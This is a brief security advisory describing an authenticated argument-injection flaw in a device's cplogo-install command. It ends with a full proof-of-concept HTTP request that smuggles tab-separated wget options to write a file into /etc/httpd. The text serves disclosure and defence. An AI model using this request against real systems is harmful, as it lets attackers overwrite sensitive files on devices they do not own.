An authenticated attacker can upload files to an arbitrary location. The issue is within the handler for the cplogo-install CLI command. The handler for the command will not filter %09(tab) characters from the param, which can cause parameter injection into wget call.
An attacker may use this vulnerability to overwrite sensitive system files.
POST /swarm.cgi HTTP/1.1 Host: IP:4343 ....... ....... ....... Cookie: sid=XXXXXXXXXXXXXXXXXXXX; login=undefined; password=undefined; userType=admin opcode=config&ip=127.0.0.1&cmd='end%20%0Aapply%20cplogo-install%20"https://IP:4343/backup.cfg%09-O%09/etc/httpd/test.txt